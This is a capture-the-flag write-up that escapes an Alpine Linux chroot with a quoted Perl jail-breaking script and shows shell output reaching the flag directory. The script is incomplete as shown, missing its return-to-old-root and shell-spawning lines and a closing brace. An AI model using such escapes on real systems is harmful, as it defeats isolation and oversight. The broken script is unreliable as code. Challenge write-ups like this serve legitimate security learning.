Not So Great Escape [Misc]

Not So Great Escape

We've set up a chroot for you to develop your musl code in. It's bare, so install whatever you need. The password is ... Feel free to log in with: socat -,raw,echo=0


Looks like it's an alpine linux chroot, meaning apk is the package installer of choice. We did some quick searching and found these slides on breaking chroot. Searched for a quick script for one of the basic methods and found this (also see code)

The basic idea behind the method is to first create a new file and maintain a file handle for that file, while creating a new chroot that doesn't contain a path to the file. Then, we will try to access that file handle from within the new chroot (that doesn't know how to represent a path to this file!).

Apparently chroot is implemented in such a way that it will use the path from original root, so then we can simply cd upwards from there until we hit the original root, and then chroot into that.


#!/usr/bin/perl -w
use strict;
# Dec 2007

# This script may be used for legal purposes only.

# Go to the root of the jail
chdir "/";

# Open filehandle to root of jail
opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";

# Create a subdir, move into it
mkdir "mysubdir";
chdir "mysubdir";

# Lock ourselves in a new jail
chroot ".";

# Use our filehandle to get back to the root of the old jail

# Get to the real root
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
        chdir "..";

# Lock ourselves in real root - so we're not really in a jail at all now
chroot ".";

# Start an un-jailed shell

Now, before we can run it, we need to make sure the box has perl installed: apk add perl. Then we simply run it and we're in the original root:

/ # ls
bin    etc    lib    mnt    proc   root   sbin   sys    usr
dev    home   media  opt    pwn    run    srv    tmp    var
/ # ls pwn
flag.txt             jail                 not-so-great-escape
/ # cat pwn/flag.txt